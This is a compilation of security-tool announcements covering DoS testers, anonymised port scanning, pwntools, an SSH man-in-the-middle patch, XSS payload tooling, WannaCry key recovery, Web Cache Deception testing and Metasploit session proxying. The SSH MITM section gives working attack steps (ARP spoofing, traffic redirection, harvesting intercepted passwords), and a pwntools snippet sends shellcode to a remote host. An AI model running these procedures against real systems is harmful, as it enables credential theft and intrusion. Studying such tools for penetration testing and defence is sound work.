
WarChild – Denial of Service Testing Suite

Warchild is a denial of service testing suite for analysing how well your website holds up against the different kinds of denial of service attacks it may face, which are mainly organised by criminals to cause damage to your website.

Installation

To install the required modules, just run the following command in your terminal :)

pip install -r requirements.txt

Use

python warchild.py

Overview

This Denial Of Service suite comprises of the following features :
  1. CloudBust :- Cloudbust, a.k.a. AETHON, is a Cloudflare resolver that looks for misconfigured DNS entries of a Cloudflare-protected website; it basically uses dnsdumpster.com as its resolver :) and identifies the backend IP of the website. We will add more updates in the coming time.
  2. HTTP Flood :- An HTTP flood is a type of denial of service attack in which the attacker sends large numbers of unwanted HTTP GET and POST requests in order to attack a web server or application. In an HTTP flood, HTTP clients such as web browsers interact with an application or server to send HTTP requests. The aim of the attack is to compel the server to allocate as many resources as possible to serving the attack, thus denying legitimate users access to the server’s resources. ALISA is the suite’s HTTP DoS tool, a layer 7 tool written to exhaust all of the website’s resources.
  3. TCP SYN Flood :- A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target’s system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
  4. UDP Flood :- A UDP flood attack is a denial-of-service (DoS) attack using the User Datagram Protocol (UDP), a sessionless/connectionless computer networking protocol.


Author
Souhardya Sardar is an independent security analyst and programmer who loves to break things in order to secure them. GitHub: github.com/Souhardya

The post WarChild – Denial of Service Testing Suite appeared first on DigitalMunition.


scanless – Public Port Scan Scrapper

Command-line utility for using websites that can perform port scans on your behalf. Useful for early stages of a penetration test or if you’d like to run a port scan on a host and have it not come from your IP address.
scanless (adj): lacking respectable morals. That girl is scanless!

Public Port Scanners

Usage
Requires the requests and bs4 libraries to run, install with pip.

$ python scanless.py --help
usage: scanless.py [-h] [-t TARGET] [-s SCANNER] [-l] [-a]

scanless, public port scan scrapper

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        ip or domain to scan
  -s SCANNER, --scanner SCANNER
                        scanner to use (default: yougetsignal)
  -l, --list            list scanners
  -a, --all             use all the scanners

$ python scanless.py --list
Scanner Name   | Website
---------------|------------------------------
yougetsignal   | http://www.yougetsignal.com
viewdns        | http://viewdns.info
hackertarget   | https://hackertarget.com
ipfingerprints | http://www.ipfingerprints.com
pingeu         | http://ping.eu

$ python scanless.py -s viewdns -t scanme.nmap.org
Running scanless...

------- viewdns -------
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed dns
80/tcp   open   http
110/tcp  closed pop3
139/tcp  closed netbios
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed smb
1433/tcp closed mssql
1521/tcp closed oracle
3306/tcp closed mysql
3389/tcp closed rdp
-----------------------

$ python scanless.py -a -t scanme.nmap.org
Running scanless...

------- yougetsignal -------
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed dns
80/tcp   open   http
110/tcp  closed pop3
115/tcp  closed sftp
135/tcp  closed msrpc
139/tcp  closed netbios
143/tcp  closed imap
194/tcp  closed irc
443/tcp  closed https
445/tcp  closed smb
1433/tcp closed mssql
3306/tcp closed mysql
3389/tcp closed rdp
5632/tcp closed pcanywhere
5900/tcp closed vnc
6112/tcp closed wc3
----------------------------

------- viewdns -------
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed dns
80/tcp   open   http
110/tcp  closed pop3
139/tcp  closed netbios
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed smb
1433/tcp closed mssql
1521/tcp closed oracle
3306/tcp closed mysql
3389/tcp closed rdp
-----------------------

------- hackertarget -------
tarting Nmap 7.01 ( https://nmap.org ) at 2017-05-06 02:31 UTC
Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.065s latency).
Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f
PORT     STATE  SERVICE       VERSION
21/tcp   closed ftp
22/tcp   open   ssh           OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
23/tcp   closed telnet
25/tcp   closed smtp
80/tcp   open   http          Apache httpd 2.4.7 ((Ubuntu))
110/tcp  closed pop3
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.05 second
----------------------------

------- ipfingerprints -------
Host is up (0.16s latency).
Not shown: 484 closed ports
PORT    STATE    SERVICE
22/tcp  open     ssh
80/tcp  open     http
111/tcp filtered rpcbind
135/tcp filtered msrpc
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 10 hops
------------------------------

------- pingeu -------
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed dns
80/tcp   open   http
139/tcp  closed netbios
443/tcp  closed https
445/tcp  closed smb
3389/tcp closed rdp
----------------------


Pwntools – CTF Framework And Exploit Development Library


pwntools is a CTF framework and exploit development library. Written in Python, it is designed for rapid prototyping and development, and intended to make exploit writing as simple as possible.

from pwn import *
context(arch = 'i386', os = 'linux')   # target architecture/OS used by asm() and shellcraft

r = remote('exploitme.example.com', 31337)   # open a TCP connection to the target service
# EXPLOIT CODE GOES HERE
r.send(asm(shellcraft.sh()))   # assemble a /bin/sh shellcode for the context and send it
r.interactive()                # hand the socket over to the user for an interactive shell

Documentation
Our documentation is available at docs.pwntools.com
To get you started, we’ve provided some example solutions for past CTF challenges in our write-ups repository.

Installation
pwntools is best supported on 64-bit Ubuntu 12.04 and 14.04, but most functionality should work on any POSIX-like distribution (Debian, Arch, FreeBSD, OSX, etc.). Python 2.7 is required.
Most of the functionality of pwntools is self-contained and Python-only. You should be able to get running quickly with


apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
pip install --upgrade pip
pip install --upgrade pwntools

However, some of the features (assembling/disassembling foreign architectures) require non-Python dependencies. For more information, see the complete installation instructions here.


Static Code Analyzer: PVS-Studio


PVS-Studio performs static code analysis and generates a report that helps a programmer find and fix bugs. PVS-Studio performs a wide range of code checks; it is also useful for finding misprints and copy-paste errors. Examples of such errors: V501, V517, V522, V523, V3001.

The main value of static analysis is in its regular use, so that errors are identified and fixed at the earliest stages. There is no point in wasting 50 hours looking for a bug that could be found with static analysis. So, let’s point out that again – the main idea of static analysis is not to find one hidden bug on the day before the release, but to fix dozens of bugs day by day.



The analyzer can be run at night on the server and warn about suspicious code fragments. Ideally, these errors can be detected and fixed before getting into the repository. PVS-Studio can automatically be launched immediately after the compiler for the files that have been just modified. It works in Windows and Linux.

 

Quick start in Windows and Linux

PVS-Studio can integrate into the Visual Studio 2010-2017 development environment. If you use this IDE, then most likely you will just have to go to the menu of the PVS-Studio plugin and choose “Check Current Project”.

Often, it can be a more complicated process, and you will need to integrate PVS-Studio into a build system, even an exotic one. The topic of integration is too broad to describe it here. You can find all the information in the detailed documentation.

One more point to notice – PVS-Studio for Windows and Linux has special utilities, gathering information about the compiler launches. These tools allow doing a quick analysis of a project that gets compiled in any possible way. You can quickly try out the analyzer abilities, without wasting time on its integration with makefile or a build script. See the description of the utility Standalone (Windows) and pvs-studio-analyzer (Linux).

 

The technology of analysis

  • The pattern-based analysis on the basis of an abstract syntax tree is used to look for fragments in the source code that are similar to the known code patterns with an error.
  • The type inference based on the semantic model of the program allows the analyzer to have full information about all variables and statements in the code.
  • Symbolic execution allows the analyzer to evaluate the values of variables that can lead to errors and to perform range checking on those values.
  • The data-flow analysis is used to evaluate limitations that are imposed on values of variables when processing various language constructs. For example, values that a variable can take inside if/else blocks.
  • Method annotations provide more information about the used methods than can be obtained by analyzing only their signatures.


Main features of PVS-Studio

  • Simple and seamless integration with Visual Studio 2010-2017
  • Automatic analysis of individual files after their recompilation
  • Online reference guide covering all the diagnostics available in the program, on the web site and in the documentation (presented as a .pdf file): up to 400 pages of documentation.
  • Saving and loading analysis results allow doing overnight checks – during the night the analyzer does the scanning and provides you with the results in the morning.
  • Project analysis run from the command line: helps integrate PVS-Studio into overnight builds; a new log will be issued in the morning.
  • Great scalability: support of multi-core and multi-processor systems with the possibility to specify the number of cores to use; IncrediBuild support.
  • Interactive filtering of the analysis results (the log file) in the PVS-Studio window: by the diagnostic number, file name, the keyword in the text of the diagnostic.
  • Automatic check of PVS-Studio updates (during the work in IDE and overnight builds).
  • BlameNotifier utility. The tool allows you to send e-mail notifications to the developers about bugs that PVS-Studio found during a night run.
  • A large number of options for integration into projects developed under Linux.
  • Mark as False Alarm – ability to mark the code to suppress a certain diagnostic in a particular code fragment.
  • Mass Suppression – ability to suppress all old messages raised for the legacy code, so that the analyzer reports 0 warnings. You can always go back to the suppressed messages later. This feature allows you to seamlessly integrate PVS-Studio into your development process and focus on errors found in new code only.
  • Error statistics can be viewed in Excel. Ability to view the speed of error correction, amount of bugs found for a certain period of time and so on.
  • Relative paths in report files to view them on different machines.
  • CLMonitoring feature allows analyzing the projects that have no Visual Studio files (.sln/.vcxproj); in case the CLMonitoring functionality is not enough, there is a possibility to integrate PVS-Studio in a Makefile-based build system manually.
  • pvs-studio-analyzer – a utility similar to CLMonitoring, but working under Linux.
  • Possibility to exclude files from the analysis by name, folder or mask; to run the analysis on the files modified during the last N days.
  • Integration with SonarQube. It is an open source platform, designed for continuous analysis and measurement of code quality.

 

Supported languages and compilers

  • Windows, Visual Studio 2017: C, C++, C++/CLI, C++/CX (WinRT), C#
  • Windows, Visual Studio 2015: C, C++, C++/CLI, C++/CX (WinRT), C#
  • Windows, Visual Studio 2013: C, C++, C++/CLI, C++/CX (WinRT), C#
  • Windows, Visual Studio 2012: C, C++, C++/CLI, C++/CX (WinRT), C#
  • Windows, Visual Studio 2010: C, C++, C++/CLI, C#
  • Windows, MinGW: C, C++
  • Windows/Linux, Clang: C, C++
  • Linux, GCC: C, C++

 

https://www.viva64.com/en/m/

https://www.viva64.com/en/pvs-studio-download/


Github Dorks – Github Security Scanning Tool


GitHub search is quite a powerful and useful feature and can be used to search for sensitive data in repositories. This GitHub security scanning tool comes with a collection of GitHub dorks that can reveal sensitive personal and/or proprietary organisational information such as private keys, credentials, authentication tokens and so on.


github-dork.py is a simple Python tool that can search through your repository or your organisation/user repositories. It’s not a perfect tool at the moment but provides a basic functionality to automate the search on your repositories against the dorks specified in the text file.

 

Installation

This tool uses github3.py to talk with the GitHub Search API.

Clone the repository and run:

Usage

Some example usages are listed below:

You can download Github Dorks here:

Or read more here.


SSH Man-In-The-Middle Penetration Testing Tool

A patch applied to the OpenSSH v7.5p1 source code causes it to act as a proxy between the victim and their intended SSH server; all plaintext passwords and sessions are logged to disk.

Of course, the victim’s SSH client will complain that the server’s key has changed. But because 99.99999% of the time this is caused by a legitimate action (OS re-install, configuration change, etc), many/most users will disregard the warning and continue on.

NOTE: Only run the modified sshd in a VM or container! Ad-hoc edits were made to the OpenSSH sources in critical regions, with no regard to their security implications. It’s not hard to imagine these edits introduce serious vulnerabilities. Until the dependency on root privileges is removed, be sure to only run this code on throw-away VMs/containers.

To Do

This is the first release of this tool. While it is very useful as-is, there are nevertheless things to improve:

  • Support SFTP MITM’ing.
  • Add port forwarding support.
  • Remove dependency on root privileges.
  • Create wrapper script that detects when user is trying to use key authentication only, and de-spoof them automatically.

Initial Setup

1.) Install zlib and openssl headers:
sudo apt install zlib1g-dev libssl-dev

2.) Download OpenSSH v7.5p1 and verify its signature:
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/RELEASE_KEY.asc
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz.asc
gpg --import RELEASE_KEY.asc
gpg --verify openssh-7.5p1.tar.gz.asc openssh-7.5p1.tar.gz

3.) Unpack the tarball, patch the sources, and compile it:
tar xzf openssh-7.5p1.tar.gz
patch -p0 < openssh-7.5p1-mitm.patch
mv openssh-7.5p1 openssh-7.5p1-mitm; cd openssh-7.5p1-mitm; ./configure --with-sandbox=no && make -j 10

4.) Create keys and setup environment:
sudo ssh-keygen -t ed25519 -f /usr/local/etc/ssh_host_ed25519_key < /dev/null
sudo ssh-keygen -t rsa -b 4096 -f /usr/local/etc/ssh_host_rsa_key < /dev/null
sudo useradd -m sshd && sudo useradd -m bogus && sudo chmod 0700 ~sshd ~bogus
sudo mkdir /var/empty; sudo cp ssh ~bogus/

Running The Attack

1.) Run sshd:
cd /path/to/openssh-7.5p1-mitm
sudo $PWD/sshd -f $PWD/sshd_config


2.) Enable IP forwarding:
sudo bash -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
sudo iptables -P FORWARD ACCEPT

3.) Allow connections to sshd and re-route forwarded SSH connections:
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 22

4.) ARP spoof a target(s) (Protip: do NOT spoof all the things! Your puny network interface won’t likely be able to handle an entire network’s traffic all at once. Only spoof a couple IPs at a time):
arpspoof -r -t 192.168.x.1 192.168.x.5

5.) Monitor auth.log. Intercepted passwords will appear here:
sudo tail -f /var/log/auth.log

6.) Once a session is established, a full log of all input & output can be found in /home/bogus/session_*.txt.

Sample Results

Upon success, /var/log/auth.log will have lines that log the password, like this:


May 16 23:14:01 showmeyourmoves sshd[16798]: INTERCEPTED PASSWORD: hostname: [10.199.30.x]; username: [jdog]; password: [supercalifragilistic] [preauth]

Furthermore, the victim’s entire SSH session can be found in /home/bogus/session_*.txt:

# cat /home/bogus/session_0.txt
Last login: Tue May 16 21:35:00 2017 from 10.50.22.x
OpenBSD 6.0-stable (GENERIC.MP) #12: Sat May  6 19:08:31 EDT 2017

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest version of the code.  With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

jdog@jefferson ~ $ ppss
PID TT  STAT       TIME COMMAND
59264 p0  Ss      0:00.02 -bash (bash)
52132 p0  R+p     0:00.00 ps
jdog@jefferson ~ $ iidd
uid=1000(jdog) gid=1000(jdog) groups=1000(jdog), 0(wheel)
jdog@jefferson ~ $ sssshh  jjtteessttaa@@mmaaggiiccbbooxx
jtesta@magicbox’s password: ROFLC0PTER!!1juan

Note that the characters in the user’s commands appear twice in the file because the input from the user is recorded, as well as the output from the shell (which echoes characters back). Observe that when programs like sudo and ssh temporarily disable echoing in order to read a password, duplicate characters are not logged.

Download SSH-MITM


XSS’OR – Hack with JavaScript


XSS’OR is a free online tool for hacking with JavaScript.

It contains three major modules:

1. Encode/Decode

The Encode/Decode module, including:

  • front-end encryption and decryption;
  • code compression, decompression, beautification and test execution;
  • character set conversion, hash generation;
  • and so on.

2. Codz

The Codz (code) module, including:

  • CSRF request code generation;
  • AJAX request code generation;
  • XSS attack vectors;
  • XSS attack payloads;
  • and so on.

3. Probe

The Probe module: to keep the load balanced, it is the most basic kind of probe, and each IP can generate one unique probe per day. You can use this probe for attack testing (such as XSS, phishing attacks, etc.). The probe can collect basic information about the target user, and you can dynamically inject more commands (JavaScript Codz) for “remote control” testing.


Some user experience and privacy considerations:
With XSS’OR, even if your browser is accidentally closed or crashes, your records will not be lost, because the relevant records are cached locally in your browser. The server does not store any of your private data, except that the result records of the probe (only the result records) are temporarily cached by design; these are automatically cleared every day.


Recover files encrypted by the WannaCry ransomware: wanakiwi


wanakiwi is based on wanadecrypt, which makes it possible for lucky users to:

  • Recover the private user key in memory and save it as 00000000.dky
  • Decrypt all of their files

The prime extraction method is based on Adrien Guinet’s wannakey (https://github.com/aguinet/wannakey), which consists of scanning the WannaCry process memory to recover the prime numbers that were not cleaned up during CryptReleaseContext().
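As an added illustration of that prime-scanning idea (this is not wanakiwi’s or wannakey’s code), the following Python script scans a constructed memory image for a window that divides the public modulus and rebuilds the private exponent from it. The key is a toy 128-bit RSA key, and the buffer contents, the embedding offset and the window width are assumptions made for the demo; a real RSA-2048 scan would use 128-byte windows.

```python
"""Toy reconstruction of the wannakey/wanakiwi approach: look for an RSA
prime that a process left in memory, then rebuild the private key from it.

Added example, not the tool's code. The "process memory" is a constructed
byte buffer and the key is a 128-bit toy key so the scan runs instantly.
"""
import random

# Two 64-bit primes: 2**61-1 is a Mersenne prime, 2**64-59 is the largest
# prime below 2**64. Constructed toy key, far too small for real use.
P = 2**61 - 1
Q = 2**64 - 59
E = 65537
N = P * Q
PRIME_BYTES = 8   # half the modulus size; for RSA-2048 this would be 128


def build_memory_image(prime: int, size: int = 4096, offset: int = 1234) -> bytes:
    """Constructed 'process memory': seeded random filler with the prime
    embedded little-endian (CryptoAPI keeps key material little-endian)."""
    rng = random.Random(1)
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    buf[offset:offset + PRIME_BYTES] = prime.to_bytes(PRIME_BYTES, "little")
    return bytes(buf)


def scan_for_prime(mem: bytes, n: int, width: int = PRIME_BYTES):
    """Slide a window over the image; a window is a hit when, read as an
    integer, it is a non-trivial factor of the public modulus n.
    Returns (offset, prime) or None if nothing usable is left in memory."""
    for off in range(len(mem) - width + 1):
        cand = int.from_bytes(mem[off:off + width], "little")
        if 1 < cand < n and n % cand == 0:
            return off, cand
    return None


def rebuild_private_key(n: int, e: int, p: int) -> dict:
    """With one prime known, the other is n // p and d = e^-1 mod phi(n)."""
    q = n // p
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)   # modular inverse (Python 3.8+)
    return {"n": n, "e": e, "d": d, "p": p, "q": q}


def recover_and_decrypt(mem: bytes, n: int, e: int, ciphertext: int):
    """End-to-end: scan, rebuild, decrypt one RSA block. None means the
    prime was already overwritten, which is why the tool must run ASAP."""
    hit = scan_for_prime(mem, n)
    if hit is None:
        return None
    _, p = hit
    key = rebuild_private_key(n, e, p)
    return pow(ciphertext, key["d"], n)


if __name__ == "__main__":
    mem = build_memory_image(P)
    message = 0x1337C0DE
    print(recover_and_decrypt(mem, N, E, pow(message, E, N)) == message)
```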

Usage

wanakiwi.exe [PID]

PID is an optional parameter; by default the utility will look for any of these processes:

  • wnry.exe
  • wcry.exe
  • data_1.exe
  • ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

 

Limitations

Given the fact this method relies on scanning the address space of the process that generated those keys, this means that if this process had been killed by, for instance, a reboot – the original process memory will be lost. It is very important for users to NOT reboot their system before trying this tool.

Secondly, because of the same reason we do not know how long the prime numbers will be kept in the address space before being reused by the process. This is why it is important to try this utility ASAP.

This is not a perfect tool, but this has been so far the best solution for victims who had no backup.


Compatibility

O.S.          x86   x64
Windows XP    ✓     ?
Windows 2003  ✓     ?
Windows 7     ✓     ?


Frequently Asked Questions

Does it modify the original encrypted files ?

No, the original encrypted files (.WNCRY) remain unmodified. The decrypted files are generated as separate files.

 

https://github.com/gentilkiwi/wanakiwi

 



Pybelt – The Hackers Tool Belt


Pybelt is a Python-based hackers tool belt capable of cracking hashes without prior knowledge of the algorithm, scanning ports on a given host, searching for SQLi vulnerabilities in a given URL, verifying that your Google dorks work like they should, verifying the algorithm of a given hash, scanning a URL for XSS vulnerability, and finding usable HTTP proxies.

 

Features

Pybelt is an open source python hacking kit that comes with:

  • Port Scanner
  • SQL Injection scanner
  • Dork Checker
  • Hash Cracker
  • Hash Type Verification
  • Proxy Finder
  • XSS Scanner


Installation

Clone the repository:

Or download the latest release.

Once you have the program installed cd into the directory and run the following command:

This will install all of the program’s needed libraries, and it should be able to be run from there.

You can download Pybelt here:

Pybelt-1,0.zip

Or read more here.


Airachnid Burp Extension – A Burp Extension to test applications for vulnerability to the Web Cache Deception attack

A Burp extension to test applications for vulnerability to the Web Cache Deception attack.
Once the extension has been loaded, it can be accessed from the Target – Sitemap tab by right-clicking on the resource that should be tested. A context-sensitive menu item called “Airachnid Web Cache Test” will be shown and can be used to conduct the test. If the resource is vulnerable, an Issue is created detailing the vulnerability.
The context sensitive menu item is also available for requests in the Proxy – Http History tab.
Installation
  • Download the Airachnid.jar file.
  • In Burp Suite open Extender tab. In Extensions tab, click Add button.
  • Choose downloaded jar file -> Next.
  • Check installation for no error messages.
Vulnerability
In February 2017, security researcher Omer Gil unveiled a new attack vector dubbed “Web Cache Deception” (https://omergil.blogspot.co.il/2017/02/web-cache-deception-attack.html).
The Web Cache Deception attack could be devastating in consequences, but is very simple to execute:
  1. Attacker coerces victim to open a link on the valid application server containing the payload.
  2. Attacker opens newly cached page on the server using the same link, to see the exact same page as the victim.

Note: of course, this attack only makes sense when the vulnerable resource available to the attacker returns sensitive data.

The attack depends on a very specific set of circumstances to make the application vulnerable:

1. The application only reads the first part of the URL to determine the resource to return.
If the victim requests:

https://www.example.com/my_profile

The application returns the victim profile page. The application uses only the first part of the URL to determine that the profile page should be returned. If the application receives a request for

https://www.example.com/my_profile_test

It would still return the profile page of the victim, disregarding the added text. The same applies for other URL like

https://www.example.com/my_profile/test

2. The application stack caches resources according to their file extensions, rather than by cache header values. If the application stack has been configured to cache image files, it will cache all resources with .jpg, .png or .gif extensions. That means that e.g. the image at

https://www.example.com/images/dog.jpg

Would be retrieved from the application server the first time the image is requested. All subsequent requests for the image are retrieved from cache, responding with the same resource that was initially cached (for as long as the cache timeout is set).


Attack
These preconditions can be exploited for the Web Cache Deception attack in the following manner:

Step 1: An attacker entices the victim to open a maliciously crafted link:
https://www.example.com/my_profile/test.jpg

  • The application ignores the ‘test.jpg’ part of the URL, the victim profile page is loaded.
  • The caching mechanism identifies the resource as an image, caching it.

Step 2: The attacker sends a GET request for the cached page:
https://www.example.com/my_profile/test.jpg

  • The cached resource, which is in fact the victim profile page is returned to the attacker (and to anyone else requesting it).
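To make the two preconditions concrete from the defender’s side, here is an added Python simulation (not part of Airachnid or Burp) of a toy origin and a shared cache: the loose-routing origin combined with an extension-keyed cache hands the victim’s page to the attacker, while fixing either the routing or the cache policy stops the leak. The paths, page contents and cookie names are constructed for the demo.

```python
"""Simulation of the Web Cache Deception preconditions and their fixes.
Constructed example: a toy origin server and a toy shared cache."""
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional


@dataclass
class Response:
    status: int
    body: str
    headers: Dict[str, str] = field(default_factory=dict)


# Constructed sample data: one private page (selected by session cookie) and
# one genuinely public image. Nothing here comes from a real site.
PROFILE_OF = {"victim_session": "Profile page of Alice (private, constructed)"}
STATIC = {"/images/dog.jpg": "<jpeg bytes>"}


def loose_origin(path: str, cookie: Optional[str]) -> Response:
    """Precondition 1: only the first path segment selects the resource, so
    /my_profile/test.jpg still serves the caller's profile, and the response
    carries no cache directives at all."""
    if path in STATIC:
        return Response(200, STATIC[path])
    if path.split("/")[1] == "my_profile" and cookie in PROFILE_OF:
        return Response(200, PROFILE_OF[cookie])
    return Response(404, "not found")


def strict_origin(path: str, cookie: Optional[str]) -> Response:
    """Hardened origin: exact routing plus explicit Cache-Control, so unknown
    paths get a 404 and the private page is marked non-cacheable."""
    if path in STATIC:
        return Response(200, STATIC[path], {"Cache-Control": "public, max-age=3600"})
    if path == "/my_profile" and cookie in PROFILE_OF:
        return Response(200, PROFILE_OF[cookie], {"Cache-Control": "private, no-store"})
    return Response(404, "not found", {"Cache-Control": "no-store"})


class SharedCache:
    """Toy CDN/reverse-proxy cache keyed by URL only (cookies are not part
    of the key), which is what makes the cached page visible to everyone."""

    def __init__(self, origin: Callable[[str, Optional[str]], Response], by_extension: bool):
        self.origin = origin
        self.by_extension = by_extension   # True reproduces precondition 2
        self.store: Dict[str, Response] = {}

    def is_cacheable(self, path: str, resp: Response) -> bool:
        if self.by_extension:
            # Weak policy: "it ends in .jpg/.png/.gif, so it must be an image".
            return path.rsplit(".", 1)[-1] in ("jpg", "png", "gif")
        # Hardened policy: cache only what the origin explicitly marks public.
        cc = resp.headers.get("Cache-Control", "")
        return resp.status == 200 and "public" in cc and "no-store" not in cc

    def get(self, path: str, cookie: Optional[str] = None) -> Response:
        if path in self.store:
            return self.store[path]
        resp = self.origin(path, cookie)
        if self.is_cacheable(path, resp):
            self.store[path] = resp
        return resp


def run_attack(cache: SharedCache) -> str:
    """Step 1: the logged-in victim opens the crafted link.
    Step 2: the attacker, with no session, requests the same URL."""
    cache.get("/my_profile/test.jpg", cookie="victim_session")
    return cache.get("/my_profile/test.jpg", cookie=None).body


def demo() -> Dict[str, str]:
    """What the attacker ends up seeing under each configuration."""
    return {
        "vulnerable": run_attack(SharedCache(loose_origin, by_extension=True)),
        "routing_fixed": run_attack(SharedCache(strict_origin, by_extension=True)),
        "cache_fixed": run_attack(SharedCache(loose_origin, by_extension=False)),
    }


if __name__ == "__main__":
    for name, seen in demo().items():
        print(f"{name:14s} -> attacker sees: {seen}")
```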

 


Meterpreter Session Proxy: Metasploit Aggregator


The Metasploit Aggregator is a proxy for Meterpreter sessions. Normally, Meterpreter sessions connect directly to a Metasploit listener. However, this has a few problems:

  1. Multiple users cannot easily share the session once it is established, without some sort of external multiplexing scheme, such as running msfconsole in a screen session. While Metasploit Pro solves this issue to a certain extent, it is also limited by the number of users that can simultaneously interact with shared sessions.
  2. Running a full msfconsole on a remote listener is resource intensive because it uses multiple threads per connection. It has a hard time scaling reliably to thousands of sessions, and even fewer on Windows platforms.
  3. The design requires either running different copies of msfconsole, or putting all of your eggs in one basket. It is difficult to distribute sessions across many endpoints and have a global view of them all.

 

The Metasploit Aggregator solves these problems by implementing an event-driven listener that stands between msfconsole and Meterpreter. It can scale to thousands of connections, but only needs to make a single connection with Metasploit Framework to manage them all. Sessions can be shared between multiple users without any changes to the Meterpreter session itself, such as modifying the session transport configuration. The redirection of a session occurs behind the scenes on the control channel between Metasploit Aggregator and msfconsole.

Metasploit Aggregator introduces a few new concepts.

  • A ‘parked’ session is one that is terminated entirely by Metasploit Aggregator. This means that the minimal interaction with the session to simply keep it alive is handled by the aggregator automatically. A user can attach to a session at any time in order to interact with it.
  • A ‘cable’ is a listening port that the aggregator opens to accept new connections from Meterpreter. This is analogous to starting a handler on msfconsole.
  • The ‘default forward’ address is the location of a msfconsole instance that serves as a helper for Metasploit Aggregator. Metasploit Aggregator currently does not know how to handle staged sessions, request session details, or how to deal with AutoRun scripts. The default forward is where a session connecting to a cable is redirected on initial connection. The connection is enumerated for details of the target and continues to communicate with the default forward until requested specifically by another console or parked by request of the default forward.
  • A ‘forwarded’ session is one that terminates at the aggregator, but is then proxied to a msfconsole instance. The session is forwarded over a control channel connection to the aggregator. When you are done interacting with a session, it can be moved back to a ‘parked’ state for other users to use. Note: any user can steal a session if desired and forward it to a different msfconsole instance.

 

Installing

Standalone installation: gem install metasploit-aggregator.

To use Metasploit Aggregator, first start an instance of the aggregator itself. This is automatically packaged with Metasploit Framework, or can be installed standalone by running gem install metasploit-aggregator. The aggregator binary is called metasploit-aggregator, and listens on address 127.0.0.1, port 2447. Because the aggregator does not provide encryption or authentication by itself, to connect to a remote instance, we suggest using SSH port forwarding or some other tunneling technology to reach a remote aggregator.

On the system hosting the aggregator:

metasploit-framework$ metasploit-aggregator
2017-03-06 13:17:32 -0600 Starting administration service on 127.0.0.1:2447

On the client system:

ssh user@aggregator -L 127.0.0.1:2447:127.0.0.1:2447

Next, start a msfconsole instance and load the aggregator plugin. This will allow you to interact with the remote aggregator. This is also required to set up the default forward msfconsole instance. Set up the msfconsole instance to be the default forward. This instance will see all connections when they first arrive.


metasploit-framework$ ./msfconsole

  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v4.14.1-dev-5383900                  ]
+ -- --=[ 1627 exploits - 928 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > load aggregator
[*] Aggregator interaction has been enabled
[*] Successfully loaded plugin: aggregator
msf > aggregator_connect 127.0.0.1:2447
[*] Connecting to Aggregator instance at 127.0.0.1:2447...
msf >

 

https://github.com/rapid7/metasploit-aggregator

The post Meterpreter Session Proxy: Metasploit Aggregator appeared first on DigitalMunition.

Sn1per – Penetration Testing Automation Scanner


 

Sn1per is a penetration testing automation scanner that can be used during a penetration test to enumerate and scan for vulnerabilities.

Features

  • Automatically collects basic recon (i.e. whois, ping, DNS, etc.)
  • Automatically launches Google hacking queries against a target domain
  • Automatically enumerates open ports via Nmap port scanning
